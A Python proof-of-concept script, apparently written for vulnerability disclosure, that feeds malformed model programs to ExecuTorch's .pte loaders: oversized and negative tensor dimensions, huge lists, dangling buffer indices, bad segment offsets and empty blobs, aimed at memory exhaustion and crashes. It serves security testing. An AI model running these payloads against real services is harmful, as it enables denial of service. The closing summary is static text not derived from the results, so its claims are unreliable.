File size: 14,596 Bytes
3b30e81
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
"""
PoC: ExecuTorch .pte Format Validation Bypass
===============================================
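Demonstrates that ExecuTorch's deserialize_pte_binary() performs no
structural validation on .pte model files before parsing them.
Note that PoCs 1-5 call the JSON loader _json_to_program() directly;
only PoC 7 passes raw bytes to deserialize_pte_binary().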

Tested on: executorch 1.2.0, Python 3.12, Windows 11
"""

import json
import os
import struct
import sys
import tempfile
import time

# Report the version of the executorch package that is actually installed, so
# the banner cannot drift from the environment the PoC really ran against.
from importlib import metadata

try:
    executorch_version = metadata.version("executorch")
except metadata.PackageNotFoundError:
    # Keep the banner printable even when no distribution metadata is found;
    # the executorch imports later in this script fail loudly on their own
    # if the package is genuinely missing.
    executorch_version = "unknown (package metadata not found)"

print("=" * 70)
print("ExecuTorch .pte Format Validation Bypass PoC")
print(f"executorch version: {executorch_version}")
print("=" * 70)

# ============================================================
# PoC 1: Extreme Tensor Dimensions (Memory Exhaustion)
# ============================================================
print("\n[PoC 1] Extreme Tensor Dimensions via _json_to_program()")
print("-" * 50)

from executorch.exir._serialize._program import _json_to_program

# The Program JSON is assembled inside-out. The single tensor claims
# (2^31 - 1) x (2^31 - 1) float elements; per the original author's note,
# Tensor.sizes in the .pte schema is List[int] with no upper bound.
oversized_tensor = {
    "scalar_type": "FLOAT",
    "storage_offset": 0,
    "sizes": [2147483647, 2147483647],
    "dim_order": [0, 1],
    "requires_grad": False,
    "layout": 0,
    "data_buffer_idx": 0,
    "allocation_info": None,
    "shape_dynamism": "STATIC",
    "val_type": "Tensor",
}
oversized_plan = {
    "name": "forward",
    "container_meta_type": {
        "encoded_inp_str": "",
        "encoded_out_str": "",
    },
    "values": [{"val": oversized_tensor, "val_type": "Tensor"}],
    "inputs": [],
    "outputs": [],
    "chains": [],
    "operators": [],
    "delegates": [],
    "non_const_buffer_sizes": [0],
}
oversized_program = {
    "version": 1,
    "execution_plan": [oversized_plan],
    # The backing buffer holds one byte while the tensor claims ~2^62 elements.
    "constant_buffer": [{"storage": [0]}],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
}
oversized_json = json.dumps(oversized_program)

# Everything that touches the parsed program stays inside the try so that any
# failure, at parse time or while reading fields back, is reported as PROTECTED.
try:
    parsed_program = _json_to_program(oversized_json.encode("utf-8"))
    claimed_sizes = parsed_program.execution_plan[0].values[0].val.sizes
    element_count = 1
    for extent in claimed_sizes:
        element_count = element_count * extent
    print(f"  [VULNERABLE] Program accepted with tensor sizes: {claimed_sizes}")
    print(f"  -> Total elements: {element_count} (~{element_count / 1e18:.1f} exa-elements)")
    print(f"  -> Actual storage in buffer: {len(parsed_program.constant_buffer[0].storage)} byte(s)")
    print(f"  -> sizeof(float) * elements would require: {4 * element_count / 1e18:.1f} exabytes")
    print("  -> No validation rejected these impossible dimensions!")
except Exception as exc:
    print(f"  [PROTECTED] {exc}")

# Second variant of PoC 1: each extent is small (2), but the tensor declares
# an extremely large number of dimensions.
MANY_DIMS_RANK = 10000

many_dims_tensor = {
    "scalar_type": "FLOAT",
    "storage_offset": 0,
    "sizes": [2] * MANY_DIMS_RANK,
    "dim_order": list(range(MANY_DIMS_RANK)),
    "requires_grad": False,
    "layout": 0,
    "data_buffer_idx": 0,
    "allocation_info": None,
    "shape_dynamism": "STATIC",
    "val_type": "Tensor",
}
many_dims_plan = {
    "name": "forward",
    "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
    "values": [{"val": many_dims_tensor, "val_type": "Tensor"}],
    "inputs": [],
    "outputs": [],
    "chains": [],
    "operators": [],
    "delegates": [],
    "non_const_buffer_sizes": [0],
}
many_dims_json = json.dumps({
    "version": 1,
    "execution_plan": [many_dims_plan],
    "constant_buffer": [{"storage": [0]}],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
})

# Report how many dimensions survive the round trip through the loader.
try:
    many_dims_program = _json_to_program(many_dims_json.encode("utf-8"))
    parsed_rank = len(many_dims_program.execution_plan[0].values[0].val.sizes)
    print(f"  [VULNERABLE] Program accepted with {parsed_rank} tensor dimensions!")
except Exception as exc:
    print(f"  [PROTECTED - dim count] {exc}")


# ============================================================
# PoC 2: Excessive List Sizes (Memory Exhaustion via lists)
# ============================================================
print("\n[PoC 2] Excessive List Sizes in Program Fields")
print("-" * 50)

# Craft a Program whose execution_plan list holds a very large number of
# otherwise-empty plans.
N_EXECUTION_PLANS = 100000

crafted_json_massive = json.dumps({
    "version": 1,
    "execution_plan": [
        {
            "name": f"plan_{i}",
            "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
            "values": [],
            "inputs": [],
            "outputs": [],
            "chains": [],
            "operators": [],
            "delegates": [],
            "non_const_buffer_sizes": []
        }
        for i in range(N_EXECUTION_PLANS)
    ],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []}
})

# Encode once, before the timer starts, so the measurement covers only the
# loader. The byte length of this payload is what gets reported below: the
# script has no measurement of the memory consumed while deserializing, so it
# must not label the input size as "memory used".
massive_payload = crafted_json_massive.encode("utf-8")
payload_mb = len(massive_payload) / 1024 / 1024

# perf_counter() is monotonic, so the interval cannot be skewed by wall-clock
# adjustments the way a time.time() difference can.
start = time.perf_counter()
try:
    program3 = _json_to_program(massive_payload)
    elapsed = time.perf_counter() - start
    plan_count = len(program3.execution_plan)
    print(f"  [VULNERABLE] Program accepted with {plan_count} execution plans")
    print(f"  -> Deserialization took {elapsed:.2f}s for a ~{payload_mb:.1f} MB JSON payload")
    print("  -> No limit on execution_plan count!")
except MemoryError:
    print(f"  [PARTIAL] Memory error with {N_EXECUTION_PLANS} plans (resource exhaustion)")
except Exception as e:
    # Any other failure is reported with its type and a truncated message.
    print(f"  [Result] {type(e).__name__}: {str(e)[:100]}")


# ============================================================
# PoC 3: Negative / Zero Dimensions
# ============================================================
print("\n[PoC 3] Negative / Zero / Invalid Tensor Dimensions")
print("-" * 50)


def _program_json_with_sizes(dims):
    """Return Program JSON text holding one FLOAT tensor whose sizes are *dims*."""
    tensor = {
        "scalar_type": "FLOAT",
        "storage_offset": 0,
        "sizes": dims,
        "dim_order": list(range(len(dims))),
        "requires_grad": False,
        "layout": 0,
        "data_buffer_idx": 0,
        "allocation_info": None,
        "shape_dynamism": "STATIC",
        "val_type": "Tensor",
    }
    plan = {
        "name": "forward",
        "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
        "values": [{"val": tensor, "val_type": "Tensor"}],
        "inputs": [],
        "outputs": [],
        "chains": [],
        "operators": [],
        "delegates": [],
        "non_const_buffer_sizes": [0],
    }
    return json.dumps({
        "version": 1,
        "execution_plan": [plan],
        "constant_buffer": [{"storage": [0]}],
        "backend_delegate_data": [],
        "segments": [],
        "constant_segment": {"segment_index": 0, "offsets": []},
    })


# (sizes, label) pairs fed to the loader one at a time.
# NOTE(review): a size of 0 may describe a legitimate empty tensor rather than
# an invalid shape - confirm before counting the first case as a finding.
dimension_cases = (
    ([0], "zero-dim"),
    ([-1], "negative-dim (-1)"),
    ([-100], "negative-dim (-100)"),
    ([1, -1, 1], "mixed negative"),
)

for case_sizes, case_label in dimension_cases:
    case_json = _program_json_with_sizes(case_sizes)
    try:
        case_program = _json_to_program(case_json.encode("utf-8"))
        print(f"  [VULNERABLE] {case_label}: sizes={case_sizes} accepted, parsed as {case_program.execution_plan[0].values[0].val.sizes}")
    except Exception as exc:
        print(f"  [PROTECTED] {case_label}: rejected - {type(exc).__name__}")


# ============================================================
# PoC 4: Buffer/Storage Size Mismatch
# ============================================================
print("\n[PoC 4] Tensor-Buffer Size Mismatch")
print("-" * 50)

# The tensor points at buffer index 999 while the program's constant_buffer
# list is empty, so the index cannot refer to any existing buffer.
dangling_tensor = {
    "scalar_type": "FLOAT",
    "storage_offset": 0,
    "sizes": [100, 100],
    "dim_order": [0, 1],
    "requires_grad": False,
    "layout": 0,
    "data_buffer_idx": 999,
    "allocation_info": None,
    "shape_dynamism": "STATIC",
    "val_type": "Tensor",
}
dangling_plan = {
    "name": "forward",
    "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
    "values": [{"val": dangling_tensor, "val_type": "Tensor"}],
    "inputs": [],
    "outputs": [],
    "chains": [],
    "operators": [],
    "delegates": [],
    "non_const_buffer_sizes": [0],
}
dangling_json = json.dumps({
    "version": 1,
    "execution_plan": [dangling_plan],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": [],
    "constant_segment": {"segment_index": 0, "offsets": []},
})

# Only acceptance vs. rejection matters here; the parsed program is not inspected.
try:
    _json_to_program(dangling_json.encode("utf-8"))
    print("  [VULNERABLE] Program accepted with data_buffer_idx=999 but only 0 buffers exist")
    print("  -> Tensor references non-existent buffer, will crash at runtime")
except Exception as exc:
    print(f"  [PROTECTED] {exc}")


# ============================================================
# PoC 5: Segment Offset Manipulation
# ============================================================
print("\n[PoC 5] Malicious Segment Offsets")
print("-" * 50)

# Three segment records: a plausible one, one with a very large offset and
# size, and one with a negative offset.
suspicious_segments = [
    {"offset": 0, "size": 100},
    {"offset": 999999999, "size": 999999999},
    {"offset": -1, "size": 100},
]
empty_plan = {
    "name": "forward",
    "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
    "values": [],
    "inputs": [],
    "outputs": [],
    "chains": [],
    "operators": [],
    "delegates": [],
    "non_const_buffer_sizes": [],
}
segments_json = json.dumps({
    "version": 1,
    "execution_plan": [empty_plan],
    "constant_buffer": [],
    "backend_delegate_data": [],
    "segments": suspicious_segments,
    "constant_segment": {"segment_index": 0, "offsets": [0]},
})

try:
    segments_program = _json_to_program(segments_json.encode("utf-8"))
    print("  [VULNERABLE] Program accepted with invalid segment offsets:")
    for index, segment in enumerate(segments_program.segments):
        # NOTE(review): the label reflects only the sign of the offset, so the
        # very large second segment is still tagged VALID.
        if segment.offset >= 0:
            verdict = "VALID"
        else:
            verdict = "INVALID (negative)"
        print(f"    Segment {index}: offset={segment.offset}, size={segment.size} [{verdict}]")
except Exception as exc:
    print(f"  [PROTECTED] {exc}")


# ============================================================
# PoC 6: Deeply Nested Structure (Recursion Bomb)
# ============================================================
print("\n[PoC 6] Recursion Depth via _json_to_dataclass")
print("-" * 50)

# The helper is imported but never called in this section; the import only
# confirms that it is present in the installed executorch build.
from executorch.exir._serialize._dataclass import _json_to_dataclass  # noqa: F401

# This section is informational only. The previous version built a
# 10000-level nested dict that was never passed to anything, and wrapped the
# prints below in a try/except RecursionError that could not fire because the
# try body contained nothing but constant print() calls. Both were removed so
# the script no longer suggests that a recursion test is being executed.
print("  [INFO] ExecuTorch schema does not have self-referential types,")
print("  [INFO] but _json_to_dataclass() would recurse without depth limit")
print("  [INFO] on attacker-controlled structures if schema changed.")


# ============================================================
# PoC 7: Empty/Corrupted Model File
# ============================================================
print("\n[PoC 7] Empty or Malformed .pte Binary")
print("-" * 50)

from executorch.exir._serialize._program import deserialize_pte_binary

# Tests 1 and 2 share one shape: hand a degenerate blob to the binary loader
# and report whether it raised. Each row is
# (payload, wording when accepted, wording when rejected).
degenerate_blobs = (
    (b"", "Empty bytes", "Empty bytes"),              # Test 1: zero-length input
    (b"\x00" * 100, "100 null bytes", "Null bytes"),  # Test 2: 100 null bytes
)
for blob, accepted_as, rejected_as in degenerate_blobs:
    try:
        deserialize_pte_binary(blob)
        print(f"  [VULNERABLE] {accepted_as} accepted by deserialize_pte_binary()")
    except Exception as exc:
        print(f"  [PROTECTED] {rejected_as}: {type(exc).__name__}: {str(exc)[:80]}")

# Test 3: a 16-byte blob shaped like a tiny flatbuffer. Per the original
# author's description of the layout: a 4-byte little-endian root offset (8),
# a 4-byte file identifier ("ET00"), then 8 zero bytes of data.
tiny_flatbuffer = b"".join([struct.pack("<I", 8), b"ET00", b"\x00" * 8])
try:
    loaded = deserialize_pte_binary(tiny_flatbuffer)
    print("  [VULNERABLE] Minimal valid-ish flatbuffer accepted!")
    print(f"  -> Program version: {loaded.program.version}")
    print("  -> No magic byte verification beyond what flatc does")
except Exception as exc:
    print(f"  [PARTIAL] Minimal flatbuffer: {type(exc).__name__}: {str(exc)[:100]}")


# ============================================================
# Summary
# ============================================================
summary_rule = "=" * 70
print("\n" + summary_rule)
print("SUMMARY")
print(summary_rule)

# NOTE(review): this text is static. It is printed verbatim on every run and
# is not derived from the [VULNERABLE]/[PROTECTED] results emitted earlier in
# the script - confirm it against the actual output before relying on it.
summary_text = """
Key findings for ExecuTorch .pte format:

1. NO DIMENSION UPPER BOUND: Tensor sizes can be 2^31-1 or higher,
   accepted without validation. 10000-dimensional tensors accepted.

2. NO LIST SIZE LIMITS: execution_plan, chains, operators, values etc.
   have no upper bounds — can cause OOM during deserialization.

3. NEGATIVE/ZERO DIMS ACCEPTED: Negative and zero tensor dimensions
   pass through _json_to_dataclass() without rejection.

4. BUFFER INDEX OOB: Tensors can reference non-existent buffer indices,
   causing runtime crashes.

5. NO STRUCTURAL VALIDATION: deserialize_pte_binary() performs zero
   validation on the binary blob before parsing. No magic byte check,
   no size limits, no sanity checks.

6. NO check_model() EQUIVALENT: The verifier only checks graph-level
   semantics (operator validity, tensor contiguity) and is OPTIONAL
   (controlled by _check_ir_validity flag).

7. SEGMENT OFFSETS UNVALIDATED: Segment offsets can be negative or
   point past end of data — accepted without rejection.

Compared to ONNX (check_model, shape inference) and TF SavedModel,
ExecuTorch's loading pipeline is completely trusting of input data.
"""
print(summary_text)